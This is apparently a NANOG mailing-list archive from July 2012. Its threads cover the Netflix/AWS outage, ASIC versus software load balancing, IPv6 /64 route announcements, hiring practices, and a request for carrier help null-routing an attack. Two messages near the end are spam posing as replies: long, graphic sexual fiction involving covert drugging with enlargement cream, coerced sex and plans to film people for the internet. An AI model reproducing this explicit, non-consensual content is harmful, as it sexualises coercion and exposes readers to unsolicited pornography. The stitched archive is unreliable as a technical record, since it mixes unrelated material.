$$$$$ black boxes from your favourite brand name vendor have software running inside of them do you not ? Case in point for example, the recent LINX issues.... it wasn't the hardware that gave them the headaches, but the software running on it sure did ! >I am a big believer in using hardware to load balance data centers, and not >leave it up to software in the data center which might fail.? From ahebert at pubnix.net Mon Jul 9 07:07:14 2012 From: ahebert at pubnix.net (Alain Hebert) Date: Mon, 09 Jul 2012 08:07:14 -0400 Subject: FYI Netflix is down In-Reply-To: <1341834149.51473.YahooMailNeo@web29403.mail.ird.yahoo.com> References: <1341834149.51473.YahooMailNeo@web29403.mail.ird.yahoo.com> Message-ID: <4FFAC972.5020402@pubnix.net> Hi, Well depending on your "black box", your millage will vary. Their wide use of ASIC eliminate a lot of the headache of pure software implementation. Buffer, timing, expected results, etc. Their "real" sofware only represent a small part of the device and is mostly relegated to management and some L4 to L7 handling. So yes, ASIC/FPGA devices have "software" their result and behavior are predictable and the system is more stable because of it. PS: Yes, CAM lockout, bad RAM is still a pita for them. In short: It is quite a thing to say that because everything can be categorized as "software" that someone point is invalid. ----- Alain Hebert ahebert at pubnix.net PubNIX Inc. 50 boul. St-Charles P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 On 07/09/12 07:42, gb10hkzo-nanog at yahoo.co.uk wrote: > Steve at pirk, > > I fail to grasp the concept in your argument. > > You do realise, do you not, that your $$$$$ black boxes from your favourite brand name vendor have software running inside of them do you not ? > > Case in point for example, the recent LINX issues.... it wasn't the hardware that gave them the headaches, but the software running on it sure did ! > >> I am a big believer in using hardware to load balance data centers, and not >> leave it up to software in the data center which might fail. > From valdis.kletnieks at vt.edu Mon Jul 9 08:08:00 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Mon, 09 Jul 2012 09:08:00 -0400 Subject: FYI Netflix is down In-Reply-To: Your message of "Mon, 09 Jul 2012 08:07:14 -0400." <4FFAC972.5020402@pubnix.net> References: <1341834149.51473.YahooMailNeo@web29403.mail.ird.yahoo.com> <4FFAC972.5020402@pubnix.net> Message-ID: <201923.1341839280@turing-police.cc.vt.edu> On Mon, 09 Jul 2012 08:07:14 -0400, Alain Hebert said: > Their wide use of ASIC eliminate a lot of the headache of pure > software implementation. And gets you, in return, the headaches of buggy hardware, where bug-fixing is just a bit harder than "load the new release". ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From streiner at cluebyfour.org Mon Jul 9 10:12:16 2012 From: streiner at cluebyfour.org (Justin M. Streiner) Date: Mon, 9 Jul 2012 11:12:16 -0400 (EDT) Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? In-Reply-To: References: Message-ID: On Mon, 9 Jul 2012, Anurag Bhatia wrote: > I was just looking around and say a major Indian provider Sify (AS9583) is > announcing /64s via BGP along with main /32 which is their allocation from > APNIC. [snip] > Is it simply a misconfiguration or there is some use of announcing /64s > along with main /32? Most of the major carriers I've seen appear to have settled on /48 as the smallest IPv6 prefix they will accept, much like /24 is the smallest IPv4 prefix that most providers will accept. Anything smaller runs the risk of mixed degrees of acceptance. As long as the /64 is part of a larger parent block, there shouldn't be any total loss of connectivity, however the routing to one of those /64 sites could be sub-optimal. Advertising /64s into the global routing table is bad mojo. jms From streiner at cluebyfour.org Mon Jul 9 10:16:36 2012 From: streiner at cluebyfour.org (Justin M. Streiner) Date: Mon, 9 Jul 2012 11:16:36 -0400 (EDT) Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? In-Reply-To: References: Message-ID: On Mon, 9 Jul 2012, Anurag Bhatia wrote: > I was just looking around and say a major Indian provider Sify (AS9583) is > announcing /64s via BGP along with main /32 which is their allocation from > APNIC. > inet6num: 2001:0E48::/32 I only see 2001:e48::/32 in my view of the v6 routing table. If any of my upstream providers don't drop anything smaller than a /48, I do... jms From raysonlogin at gmail.com Mon Jul 9 10:50:06 2012 From: raysonlogin at gmail.com (Rayson Ho) Date: Mon, 9 Jul 2012 11:50:06 -0400 Subject: FYI Netflix is down In-Reply-To: References: Message-ID: On Sun, Jul 8, 2012 at 8:27 PM, steve pirk [egrep] wrote: > I am pretty sure Netflix and others were "trying to do it right", as they > all had graceful fail-over to a secondary AWS zone defined. > It looks to me like Amazon uses DNS round-robin to load balance the zones, > because they mention returning a "list" of addresses for DNS queries, and > explains the failure of the services to shunt over to other zones in their > postmortem. There are also bugs from the Netflix side uncovered by the AWS outage: "Lessons Netflix Learned from the AWS Storm" http://techblog.netflix.com/2012/07/lessons-netflix-learned-from-aws-storm.html For an infrastructure this large, no matter you are running your own datacenter or using the cloud, it is certain that the code is not bug free. And another thing is, if everything is too automated, then failure in one component can trigger bugs in areas that no one has ever thought of... Rayson ================================================== Open Grid Scheduler - The Official Open Source Grid Engine http://gridscheduler.sourceforge.net/ >> Elastic Load Balancers (ELBs) allow web traffic directed at a single IP >> address to be spread across many EC2 instances. They are a tool for high >> availability as traffic to a single end-point can be handled by many >> redundant servers. ELBs live in individual Availability Zones and front EC2 >> instances in those same zones or in other Availability Zones. > > > >> ELBs can also be deployed in multiple Availability Zones. In this >> configuration, each Availability Zone?s end-point will have a separate IP >> address. A single Domain Name will point to all of the end-points? IP >> addresses. When a client, such as a web browser, queries DNS with a Domain >> Name, it receives the IP address (?A?) records of all of the ELBs in random >> order. While some clients only process a single IP address, many (such as >> newer versions of web-browsers) will retry the subsequent IP addresses if >> they fail to connect to the first. A large number of non-browser clients >> only operate with a single IP address. >> During the disruption this past Friday night, the control plane (which >> encompasses calls to add a new ELB, scale an ELB, add EC2 instances to an >> ELB, and remove traffic from ELBs) began performing traffic shifts to >> account for the loss of load balancers in the affected Availability Zone. >> As the power and systems returned, a large number of ELBs came up in a >> state which triggered a bug we hadn?t seen before. The bug caused the ELB >> control plane to attempt to scale these ELBs to larger ELB instance sizes. >> This resulted in a sudden flood of requests which began to backlog the >> control plane. At the same time, customers began launching new EC2 >> instances to replace capacity lost in the impacted Availability Zone, >> requesting the instances be added to existing load balancers in the other >> zones. These requests further increased the ELB control plane backlog. >> Because the ELB control plane currently manages requests for the US East-1 >> Region through a shared queue, it fell increasingly behind in processing >> these requests; and pretty soon, these requests started taking a very long >> time to complete. >> > http://aws.amazon.com/message/67457/ > > >> *In reality, though, Amazon data centers have outages all the time. In >> fact, Amazon tells its customers to plan for this to happen, and to be >> ready to roll over to a new data center whenever there?s an outage.* >> >> *That?s what was supposed to happen at Netflix Friday night. But it >> didn?t work out that way. According to Twitter messages from Netflix >> Director of Cloud Architecture Adrian Cockcroft and Instagram Engineer Rick >> Branson, it looks like an Amazon Elastic Load Balancing service, designed >> to spread Netflix?s processing loads across data centers, failed during the >> outage. Without that ELB service working properly, the Netflix and Pintrest >> services hosted by Amazon crashed.* > > http://www.wired.com/wiredenterprise/2012/06/real-clouds-crush-amazon/ > > I am a big believer in using hardware to load balance data centers, and not > leave it up to software in the data center which might fail. > > Speaking of services like RightScale, Google announced Compute Engine at > Google I/O this year. BuildFax was an early Adopter, and they gave it great > reviews... > http://www.youtube.com/watch?v=LCjSJ778tGU > > It looks like Google has entered into the VPS market. 'bout time... ;-] > http://cloud.google.com/products/compute-engine.html > > --steve pirk From mikea at mikea.ath.cx Mon Jul 9 10:57:57 2012 From: mikea at mikea.ath.cx (Mike Andrews) Date: Mon, 9 Jul 2012 10:57:57 -0500 Subject: job screening question In-Reply-To: References: <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org> Message-ID: <20120709155757.GA55453@mikea.ath.cx> On Fri, Jul 06, 2012 at 09:36:47PM -0400, William Herrin wrote: > On Fri, Jul 6, 2012 at 9:22 PM, Steven Noble wrote: > > I have talked to companies who have job openings many > > months old for people who absolutely exist in the silicon > > valley. The hiring company just thinks the people who > > apply are over or under qualified. > > I thought someone was overqualified once. My decision was overridden. > I turned out to be very glad it was. He didn't fit the role I thought > I needed but I was able to turn him loose with minimal supervision. > And I was able to go on vacation. :) That was so much more valuable. I've seen people turned away for being "overqualified", when I would have hired them in a heartbeat. The HR types seem unable to comprehend that "overqualified" is not a bad thing, especially in the current economic climate, and that it includes "qualified". Being able to bring someone in and then take vacation time without having to worry about things going casters-up is very valuable indeed. > Now I know: tell the candidate about the work, all the work not just > the job you thought you would hire for, and let him tell you whether > any of it is beneath him. As long as you get all the skills you need > on the team you can juggle the tasking. Unless you have a policy that "Slot A only does Slot A work" stuffed up some orifice. I've been there, and it is both stultifying and limiting. -- Mike Andrews, W5EGO mikea at mikea.ath.cx Tired old sysadmin From ispbuilder at gmail.com Mon Jul 9 11:01:31 2012 From: ispbuilder at gmail.com (Mike) Date: Mon, 09 Jul 2012 13:01:31 -0300 Subject: job screening question In-Reply-To: <20120709155757.GA55453@mikea.ath.cx> References: <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org> <20120709155757.GA55453@mikea.ath.cx> Message-ID: <4FFB005B.6060703@gmail.com> On 12-07-09 12:57 PM, Mike Andrews wrote: > Unless you have a policy that "Slot A only does Slot A work" stuffed > up some orifice. I've been there, and it is both stultifying and > limiting. Further to the above wisdom, if you truly care about your work it will either drive you crazy as you force yourself to fix things that aren't your problem, or as you start to force yourself not to care about someone else's crappy work. -- Looking for (employment|contract) work in the Internet industry, preferrably working remotely. Building / Supporting the net since 2400 baud was the hot thing. Ask for a resume! ispbuilder at gmail.com From davehart at gmail.com Mon Jul 9 12:20:21 2012 From: davehart at gmail.com (Dave Hart) Date: Mon, 9 Jul 2012 17:20:21 +0000 Subject: FYI Netflix is down In-Reply-To: References: Message-ID: On Mon, Jul 9, 2012 at 15:50 UTC, Rayson Ho wrote: > There are also bugs from the Netflix side uncovered by the AWS outage: > > "Lessons Netflix Learned from the AWS Storm" > > http://techblog.netflix.com/2012/07/lessons-netflix-learned-from-aws-storm.html "We continue to investigate why these connections were timing out during connect, rather than quickly determining that there was no route to the unavailable hosts and failing quickly." potential translation: "We continue to shoot ourselves in the foot by filtering all ICMP without understanding the implications." Cheers, Dave Hart From DHyde at hosting.com Mon Jul 9 12:47:27 2012 From: DHyde at hosting.com (Darrell Hyde) Date: Mon, 9 Jul 2012 13:47:27 -0400 Subject: Carrier assistance Message-ID: <1AA11A6BC714D944985F3BC7FF7AB35F64A5E78E2A@MBX03.corp.safesecureweb.com> Could anyone from Qwest/CenturyLink, TW Telecom, or XO with the ability to assist with some null routing please drop me a line off-list? Got a customer getting attacked in one of my sites and our calls are languishing in hold queues. Thanks in advance, - Darrell From nanog195 at yahoo.com Mon Jul 9 15:13:33 2012 From: nanog195 at yahoo.com (NIG NOG) Date: Mon, 9 Jul 2012 13:13:33 -0700 (PDT) Subject: Carrier assistance In-Reply-To: <1AA11A6BC714D944985F3BC7FF7AB35F64A5E78E2A@MBX03.corp.safesecureweb.com> References: <1AA11A6BC714D944985F3BC7FF7AB35F64A5E78E2A@MBX03.corp.safesecureweb.com> Message-ID: <1341864813.86295.YahooMailNeo@web142506.mail.bf1.yahoo.com> Diane spent a few more seconds over by the dresser before turning back around, condom in hand and already unwrapped. "Here we go," she grinned, slipping the condom over the throbbing mushroom-head of Terry's cock and sliding it down. The condom was lubricated inside as well as out, and the lube felt warm on his shaft. He felt a renewed surge of hardness. Diane dropped her pants and panties and positioned herself above him. She lowered her pussy down on top of Terry's beer bottle thick erection. God, what a massive clit! It makes Crissy's look small. Thought Terry. Diane's clitoris had swelled to the size of the end of her thumb, it gleamed wetly as it slid down the length of his python. Inch by inch, his impossible dick disappeared inside her. Diane grunted. This was almost more than she'd bargained for... Still, nothing she couldn't handle. She took some deep breaths and continued to ease herself down until she was sung against his balls. Terry could only stare in disbelief. Her pussy was warm and tight. It felt amazing. His dick tingled with excitement as she began to piston herself up and down, rising and falling on his monstrous member. Terry surrendered to the pleasure and grabbed Diane around her ass. She moaned with delight. That tingling was stronger now. It felt amazing. It felt... familiar. Oh shit! "Diane, what did you do?" he grunted. She thrust harder. "Hm?" she pretended not to hear. "Did you put enlargement cream in the condom?" his voice rose, tinged with panic. "Maybe just one pump," she grinned mischievously "To make things interesting." "No!" Terry bucked. Diane whooped with delight. He tried to wrestle her off of him, but she was too heavy. She pressed her boobs into his face, almost smothering him. He continued to thrash, but she gripped him tight and he couldn't escape. "Diane, I don't want to get any bigger, I can't!" Terry's cries were muffled by her gargantuan melons. "Stop being a bitch!" she laughed, riding him like a mechanical bull. Terry tired to pull out. Maybe if he got the condom off fast enough, he'd only grow a little... Nothing doing. Diane clenched her kegel muscles and his dick was suddenly stuck in a steel trap. He put all his strength behind it, but he couldn't get it to budge an inch. How the fuck was she so strong? "Did I ever tell you about the year I spent abroad in Thailand?" she grinned "I learned some pussy techniques that would make you weep." Terry believed it. If she squeezed his dick any harder, he was sure it would pop. "There's no reason we can't both enjoy this. I know I am, ahhhhhh!" she squealed as an orgasm surged through her body. "Diane, you're crazy!" he bucked again, sending another orgasm boiling through Diane's bottomed-out pussy. "Oh geez!" she exclaimed. The first surge of growth pulsed through Terry's cock. There was no stopping it now. She felt it start to thicken and lengthen inside her. She had to lower herself down some more until once again her swollen clit was flush with his crotch. Terry bucked again and Diane rode the wave. There was nothing he could do anymore but finish off as quickly as he could. He began to thrust. Quick, angry bursts, sliding in and out of her faster and faster. Diane moaned with delight. "I've never had a dick this big, never ever ever!" she yelled "Terry, you're the god of cock, you know that?" Terry wasn't listening. He threw every ounce of energy he had into making himself come as quickly as possible. Unfortunately, his engorged dick had other ideas. He had too much stamina now to be a minuteman. He saw more and more of his shaft protrude from the bottom of Diane's swollen pussy, he could feel her tighten around him as his girth swelled. Veins at the base throbbed as blood rushed into his rapidly growing member. Diane was in heaven. She didn't even care that the sex was starting to hurt. It was about time a cock hurt her. She hadn't felt this way since eleventh grade! "More, more, more! Keep growing for me, baby!" she yelled. She came again, the force of orgasm was like getting hit by a dump truck. He kept growing. After what felt like an eternity of shouting and sweating and moaning, Diane's pussy was unbearably tight. He thought he would pass out. Finally he came. He felt the shock wave of it travel up his cock. Diane felt it, too, like a small explosion inside her. The feeling gave her another orgasm and she was lost again in a sea of pleasure. "Get off, get off!" he yelled at her. "Oh, I got off alright," she mumbled, dazed. Terry finally managed to extricate himself, drawing his dick out of her as quickly as he could. No matter how much he slid out of her, more seemed to follow. The flared mushroom tip of his cock caught at the opening of her pussy and he had to give it a little tug to pop it out. The skin of the condom was streaked with a thin film of blood. Terry wasn't surprised. The monster he pulled out of her had to be at least as long and thick as his forearm from the bottom of his elbow to the tips of his outstretched fingers. Fifteen inches? Sixteen? He prayed it wasn't that big, but it was. The reservoir top of the condom dangled from the end of his dick like a water balloon full of milk. He stripped it off and tossed it in the trash where it landed with a splat. Diane lay on the bed and moaned softly to herself. He looked down at the huge, throbbing monster in front of him. This is what I get for cheating. He thought. Terry sat on the bed and held his head in his hands. His erection subsided begrudgingly, keeping most of its length even as it softened. It settled down with its head between his knees like some enormous, pink snake. "What the hell am I supposed to do with this?" he demanded. Diane stretched and propped herself up onto her elbow to get a better view. "A better question is, what won?t you do with that monster?" she grinned. "Are you kidding?" "No, that thing?s awesome. I can?t remember the last time I came so hard." "Yeah well, that?s you. Crissy?s never gonna be able to take all this! She could barely take me before!" "So... Does this mean you don?t want me to hook you guys back up, then?" Terry glared at her. "Hey, don?t get mad at me, I don?t know what you want!" she raised her hands in a gesture of surrender. "Why shouldn?t I get mad at you? Look what you did!" he gestured to his monster member, still throbbing between his knees. "You?re pretty grouchy for a guy that just got laid." "Oh, and how should I be, exactly?" "Um, happy?" "?Happy?? I can never have sex again thanks to you!" Diane laughed. "It?s not that hard, just find a girl who?s into vaginal fisting," she said. "I don?t want a girl who?s into vaginal fisting!" "Or anal, whatever floats your boat..." Terry growled in frustration and stood up off the bed. His still half-hard member swung down and flopped back and forth between his thighs as he paced. A small rope of cum drizzled from the tip. Diane eyed it like a playful cat eyes a dangling string. Her mind was already churning with schemes. "This is ridiculous," Terry muttered to himself. His mind raced with the problems brought on by his new cock. How would he fit into his jock? How would he fit into his cup? He wouldn?t be able to make a full assessment of the problem until he was fully soft. Maybe it wouldn?t be so bad. Diane purred to herself on the bed and teased her fat nipples. "Wanna go again?" she asked, feeling a sudden impulse in her ravenous vagina. "No, thanks," Terry huffed. His cock disagreed, and slowly started to lengthen again. He pulled his pants back on and stuffed the disobedient beast down the leg of his jeans. The bulge ran the entire length of his thigh, terminating at his knee with a swollen head the size of his fist. Diane laughed again. "You look ridiculous," she sniggered. "Thanks." "Seriously, though. I can?t believe you?re mad at me. Look at that beast! My mouth is watering just thinking about it." "Yeah, well, forgive me if I don?t care about your opinion." Diane shrugged and got up off the bed. "Whatever. There?s no point in crying over spilled cream. You?re stuck with a monster cock now. What you choose to do with it is your problem. I?ll be here to help whenever you decide to cheer up." "Just get the fuck out!" Terry snapped. Diane gathered up her clothes and skipped out the door, her colossal tits bouncing with every jump. Terry slammed the door behind her. What was he going to do now? Diane poked her head back in. "Can I borrow this?" she asked, grabbing the bottle of cream. "Whatever!" Terry threw his pillow at the door and Diane vanished, taking the bottle with her. She giggled all the way down the stairs. From nanog195 at yahoo.com Mon Jul 9 15:14:38 2012 From: nanog195 at yahoo.com (NIG NOG) Date: Mon, 9 Jul 2012 13:14:38 -0700 (PDT) Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? In-Reply-To: References: Message-ID: <1341864878.42779.YahooMailNeo@web142505.mail.bf1.yahoo.com> He caught a glimpse of himself in Jen?s mirror and straightened up proudly. His gargantuan, smooth ballsack hung heavy between his legs to his knees, pushing his thighs apart due to its incredible size. His thirty inch long cock bobbed up and down as he straighened up, standing up fully erect despite its monumental dimensions. His slender frame was dwarfed by his mammoth package. Chris?s swollen cock was thicker than his arm, and looked to be almost as thick as his thigh. Oh, yeah. That?s what a real man looks like. Nobody else has a cock half as nice as this one. Chris continued to stroke himself as he turned to admire himself in the mirror, watching his gargantuan rod bob up and down hypnotically. Chris experimentally thrust his hips back and forth and was rewarded with the consuming sensation of forty five pounds of hot cock and balls bouncing and flopping between his legs. Ohhh, that feels great! No wonder the girls can?t resist me. Look at all this meat. I?m surprised that Terry and Greg can keep their hands off this beautiful dick. James can?t keep his hands or mouth off my prick, and he hates gays. I must drive Greg crazy. Chis watched his thick, stiff prick slowly bob as he pumped his hips again and again, letting his immense nutsack shift between his legs. Chris reveled in the feeling of his huge, heavy ballsack sliding over the skin of his thighs He reached down and cupped his immense, bloated balls. He slowly lifted them up, feeling their mass in his arms, and letting their upper curves lift his gargantuan slab of meat. Oh, yeah. Nice and full. Tasha?s right. I do like to keep my balls nice and full. Chris bobbed his nuts up and down, admiring himself in the mirror. Why not? Bigger is better, right? Like Jen said, too big is best. Chis was mesmerized by the sight of his gargantuan genitals, looking so oversized on his small frame. Time to give this fantastic dick a little TLC. Chris confidently leaned forward to grab a bottle of Astroglide from Jen?s bedside table. ?Aaaaargh!? Chris?s erection, longer than his reach, slammed into the table. Oh, baby! Daddy?s sorry! Chris wrapped his arms around his shaft and hugged it tightly, caressing it with his fingers as he winced. The motion brought his thick, warm shaft to his face as he did so, and without thinking, he leaned forward and kissed it several times. I?m so sorry, gorgeous. I never want to hurt you. Chris continued to kiss his fat salami, moving from quick pecks with closed lips to open-mouthed kisses. Is my baby okay? Can I make it feel better? Chris continued to plant sloppy, wet kisses all over his veiny, throbbing rod. His wet lips wandered over all the hot flesh he could reach. Finally, Chris opened his mouth wide and gave his glans a long, lingering lick. Mmmmmm. Daddy will make it all better. Mmmmmmmmm-hmmmmm. What am I doing? Chris pulled his head back from his dick, with an unexpected reluctance. I?m not gay. Why am I licking my own dick? Chris sat down on the bed and looked at his own mammoth erection. Only gay guys want to suck dick, right? The urges from his huge, throbbing prick were too strong to resist completely. Chris squirted lube all over his right hand and rubbed his hands together, then grasped his thick, veiny shaft and began to stroke slowly. That?s better. It?s not gay to love jerking off. All guys jerk off. I just love it more because my cock is so big and thick. Chris stared at his monster dong with admiration. So much bigger than anyone else . He continued to stroke his shaft with delight, the huge amount of lube squelching as he spread it all over his dick. I like it when Jen licks me. It feels soooo good. I like it when Kimber and Tasha lick me. They both do it so nice. I like it when the girls lick my cock. Chris reached down and clenched his thick shaft at the base. He slid his hands up the length of his pole as he laid back on the bed. When he couldn?t reach any higher, he reversed direction and began to stroke downward towards his overstuffed balls. I?m too big to even reach my cockhead this way. It?s so great to be too big . Chris massaged his swollen, churning nuts. It felt pretty good even when James sucked my dick. I wasn?t looking for a guy to suck me off, but that felt pretty good, too. He was crazy for it, just like the girls. Anybody would be crazy for this cock. Chris started another slow, leisurely stroke up his cock, but this time he pulled his huge, thick prick close to his body, bringing his gigantic, broad cockhead close to his face. This way I can stroke it all the way to the head. His massive prick felt so heavy and hot on his torso. I like having my cock sucked . Chris?s gargantuan dick was now throbbing less than an inch away from his face. I love having my cock sucked. He began to stroke it steadily, faster and faster, keeping it held close to his body, and his face. My cock loves to be sucked. He crossed his legs in a loose lotus position, squeezing his massive ballsack with gentle pressure. Chris continued to stroke his thick salami, roaming his hands all over his sensitive shaft. My cock needs to be sucked. He brought the tip of his tongue out of his mouth and lightly licked his own cock head. Ohhhhh, yeah! The feeling was amazingly intense. That feels incredible! Chris continued to massage his veiny monster, trying to restrain himself from licking his dick again. It?s not gay if you suck your own dick, is it? He licked himself again, tentatively. Fuck, that feels good! It?s not gay if you jerk yourself off, right? Chris squeezed his legs together, increasing the pressure inside his swollen ballsack. It?s gay if you beat off another guy, but it?s not gay to jerk off yourself. Chris allowed himself a long, lingering lick, roaming from one side of his huge shaft to the other. It?s totally not gay to suck your own cock, then. Chris began to lick his own cock with increasing vigor. As his huge dick was almost six inches thicker than a two-liter bottle, he was unable to reach everywhere, but he was obviously making an effort. Mmm. Feels so good . As he continued to stroke his dick harder and faster, Chris began to slurp and kiss his own cock head, planting wet, sucking kisses all over his cock head. Such a good cock. So tasty and delicious. Soon, Chris was arching his back, hugging his fat monster to his chest to let his frenzied tongue lick the very tip of his broad, red cock head. I wish I could lick every inch, buddy, but I?m doing my best! You?re just soooo big. Stretching, Chris devoured his cock head with his tongue, from the fat, sensitive rim to the very end of his cock slit. His tongue strained to reach everywhere, but Chris?s dick was just too massive for his mouth to be able to reach every spot. I need some help licking this cock. The girls might be able to handle all of it, but I bet a few more girls could just about lick all of it at once. The thought of a bevy of beautiful girls all determinedly slurping on his giant schlong turned Chris on even more. Mmph. Chris slurped his open mouth all over his cock head, eagerly tonguing himself into a frenzy. Mmmmmph. Chris rocked his legs back and forth, pumping his bloated, overfilled balls with sensation. Mmmmmmmmmmmmph. Chris lapped his tongue up and down his hypersensitized cock slit. Oh, fuck! I?m gonna cum all over Jen?s bed! Chris could feel a massive, unstoppable orgasm building deep in his balls. He did the only thing he could. He took a deep breath and planted his mouth firmly over his own, gigantic cock slit. Uuuuuuuuuuungh! Chris felt the flood of cum begin to geyser up from his balls, flooding inexorably up his thick, hot shaft. Automatically, his arms continued to stroke his colossal rod and his legs clenched to squeeze the most spunk out of his super-sized nuts. Before he even thought about it, a torrent of thick, hot jizz had erupted into his mouth. Mmmph! There?s so much! Chris struggled to gulp it all down, already feeling a second pulse of cum building up in his balls. It tastes?good! Ughpf! Chris guzzled down the second surge of jizz, and the third, but he could tell that his weighty nutsack had plenty more to come. I?m not sure I can swallow all this. Its too much! As a fourth, then fifth flood of semen bulged out his cheeks before being sucked down, Chris felt a familiar fullness building in his flat tummy. I?m cumming so much I?m filling up my tummy! How much jizz have I swallowed? I?m getting full! Involuntarily, Chris thought of the gorgeous little Persephone, seated on the table, stuffing him with doughnut after doughnut. No, I?m not! If I can stuff myself with doughnuts I can stuff myself with cum. I can do this! Chris tightened his grip on his gigantic rod and began to pump even more vigorously. He choked down enough spunk to let himself take a gasp of air, and began to suck desperately on his own cock. Mmmmmm, yeah! Come on, baby, gimme all you got! After a dozen huge pulses of cum had surged up his cock and into his eager mouth, Chris?s stomach was full and bulging. However, he carefully and deliberately squeezed his entire shaft, from root to tip, while sucking as hard as he could. Chris carefully drained every drop of cum he could out of his huge cock before releasing his liplock on his fat cockhead. He licked his lips to recover every ounce of spunk, then rubbed his hands over his full belly with satisfaction. Aaaaah. Just a little bit and all of this will go right back to fattening up my balls. I could probably do this all ni? ?Can you start over? I forgot to grab my camera.? Chris glanced around the massive column of his still firm dick and saw Tasha and Kimber watching from the open door. Kimber began to clap. ?Oh, Chris, that was amazing! I think you swallowed even more than me or Jen! ? ?What are you doing?!?? Chris heaved himself upright, his fat tree-trunk of a dick thudding onto the bed between his legs. The girls just can?t keep themselves away from this cock, can they? , he thought, smugly. He grabbed the edge of Jen?s bedspread and covered himself up carelessly, leaving a substantial amount of thick cock peeking out. Damn, I?m sitting here and this monster is past my feet. I?m so fucking huge! Chris smiled inwardly in delight. ?You said you were coming in here to make a phone call. It?s been a while. We came in to check on you,? said Tasha. Kimber nodded from slightly behind her. ?Did you call in a quart of cum for delivery?? Tasha asked, suggestively. Kimberly wrinkled her nose. ?We were just worried about you, Chrissy-, I mean, Chris. You weren?t out working out with us, and we came back and you were really enjoying yourself, and it looked pretty amazing, and?? ?Oh, it looked amazing, all right. Un-be-lievable. It should be documented and reviewed.? Tasha leered at Chris. ?We missed you at our workout,? interjected Kimber, evidently trying to steer the conversation back to safer ground. ?Maybe you two could help me with a workout in here,? said Chris, slyly, as he tossed the covers back and exposed the full, massive slab of his gargantuan prick. He licked his lips in anticipation. They won?t be able to resist it. I can barely resist it. Kimber looked uncertainly at the colossal dick lying between his legs and pursed her lips tightly. ?I don?t know, Chris,? she said, nervously. ?I just had dinner. I don?t think I could take something like that on a full stomach.? She rubbed her smooth, flat tummy gently. ?Anyway, aren?t you supposed to be waiting for Jen?? ?Oh, Jen would understand,? said Tasha, breezily. ?Look, Chris, I wanna film you, not pound down another Big Gulp of jizz, not that your?s isn?t nice. Besides, if you keep trying to feed us like that, we?re both gonna be chubby in no time. A girl has to watch her diet.? Tasha brought her hands down her slender waist. ?You, on the other hand, can gobble down all you want. It all just goes to fatten back up those big balls. So why don?t you let me get my camera, and you can start chowing down on the Chinese buffet again. Nobody will believe this, even though they will be able to watch it on the internet.? Tasha misunderstood Chris?s look of concern. ?Don?t worry, I?ll still blur out your face. Not that anybody will be able to see it with that enormous cock head in the way.? Chris was a little more plaintive this time, though the monster schlong bobbing up and down with every hand gesture spoiled the effect a bit. ?You guys don?t have to swallow if you don?t want to.? I guess it is a bit much to swallow each time. The girls can?t eat like me. ?I mean, you don?t even have to use your mouths really.? I wanted both of them sucking on me. It?s not fair! ?You could just come over and help me out a few times.? Chris gestured at his immense, throbbing dick invitingly. ?No way, Cockzilla,? said Tasha, emphatically. ?I don?t want to use the tripod, Tripod.? She giggled at her own joke. ?I want to film that beast up close and from all angles. If I?m yanking you off while using the handheld, it will be all jittery. You might have a giant monster, but I?m not shooting ?Cloverfield 2?. Kimber can jump in there and help you wrestle it into submission if she wants. That wouldn?t be as kinky as a vid of you giving yourself head, but anything featuring that big pole means instant web hits.? ?Tasha!?, exclaimed Kimber. ?I don?t want to be in your internet sex videos! Besides,? she refocused her glare at Chris, ?you promised Jen you would go without having sex until she got back.? Kimber realized she was wagging her finger at Chris?s huge member, and redirected it at his face. ?I guess jerking off doesn?t count as having sex, but I?m pretty sure that you and me playing with your great big penis does.? She looked at his dick a little pensively. ?I think jerking yourself off would be okay, though, especially since you?re so big. If Tasha and I just watched it wouldn?t be having sex.? Kimber shook her head, disrupting that chain of thought. ?Who did you need to call, anyway?? Chris exhaled, a little deflated. But my cock is right here! Don?t you both want to grab it and stroke it and squeeze it and lick it all over? He smoothed the covers back down on Jen?s bed. ?I was gonna call Terry and apologize. Offer to pay for ingredients so he can get more growth cream made.? ?You haven?t called him yet?,? asked Tasha, sternly. ?What are you waiting for? The sooner he gets more cream made, the sooner I get big boobs like Jen. You do like the big boobs, right?? ?Hey,? protested Kimber. ?I wanna have big boobs too, remember. I don?t want to be the small-chested one.? ?Oh, suck it up. I?ve been the small-chested one since we moved in together. It?s about my turn to be the busty one.? She looked at Kimber inquiringly. ?So, when you use the cream and get bigger breasts, will you be on my sex videos then? Or are you just going to waste them and keep your huge boobs hidden under a pink t-shirt?? Kimber blushed. ?I guess if I had really big boobs, nobody from high school choir would know it was me. You would still blur out my face, right?? ?Get your boobs big enough and nobody would even notice you had a face, Kimber.? Tasha mocked her lightly. ?Wait a minute. Didn?t you go to a private Christian school?? ?Yeah, so?? Kimber asked. ?Should church choir members be watching online porn? Isn?t that against the rules or something?? huffed Tasha. ?Tasha, you?re not supposed to. That doesn?t mean you don?t. I?m not supposed to have oral sex with my own boyfriend, much less my roommate?s boyfriend. I?m not supposed to be standing here staring at his gigantic dick. I?m probably not supposed to rub some cream all over my boobs so I can get really stacked. Doesn?t mean I?m not gonna. Duh!? Kimber gave her roommate a stupid look, mocking her. ?So, why are you not dialing your roommate, Chris?? Tasha looked back at his naked body, his massive prick glossy with lubricant. ?You?ve got two girls waiting to get huge boobs, and you haven?t even offered to buy the raw materials yet. Where are your priorities, kiddo?? ?I?m getting my phone.? Chris struggled to get up with his massive, though slightly softer, erection. ?Hey, I just said ?big?. I didn?t say ?huge?,? protested Kimber. ?You said ?really big?. We both know that there?s no way you?re gonna be satisfied being smaller than Jen, and there?s no way I?m not gonna be bigger than Jen. So you?ve gotta get bigger than Jen too, and bigger than Jen is ?huge?. It?s mathematical.? Tasha shrugged. ?What if I wanted to be the same size as Jen? She?s got nice breasts, and they are big, but they aren?t huge. What about that?,? countered Kimber. ?Fine with me, short stuff. But being the same size as Jen once I get big boobs from the cream means you are tied with her for smallest chest. If you 